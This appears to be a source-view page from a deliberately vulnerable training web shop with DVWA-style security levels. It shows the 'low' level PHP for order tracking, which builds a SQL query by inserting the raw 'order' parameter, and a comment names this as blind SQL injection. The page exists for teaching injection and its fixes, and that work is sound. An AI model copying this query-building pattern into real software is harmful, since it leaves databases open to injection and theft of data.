🛒 sekumartdeals so good it should be illegal
USD EUR GBP 🏴 0/6 🛒 cart (1) login
security level: low medium high impossible

Source: track (security level: low)

Flip the security level in the header to compare the vulnerable and fixed code paths.

<?php // LOW: order code concatenated raw -> blind (boolean/time) SQL injection. Only status/existence
// leaks to the page, which is exactly the blind scenario.
$o = isset($_GET['order']) ? $_GET['order'] : '';
$status=null$found=false$track_error=null;
if(
$o!==''){
    
$q="SELECT status FROM orders WHERE code='$o'";
    
$res=@mysqli_query(db(),$q);
    if(
$res){ if($row=mysqli_fetch_assoc($res)){ $found=true$status=$row['status']; } } else $track_error=mysqli_error(db());
}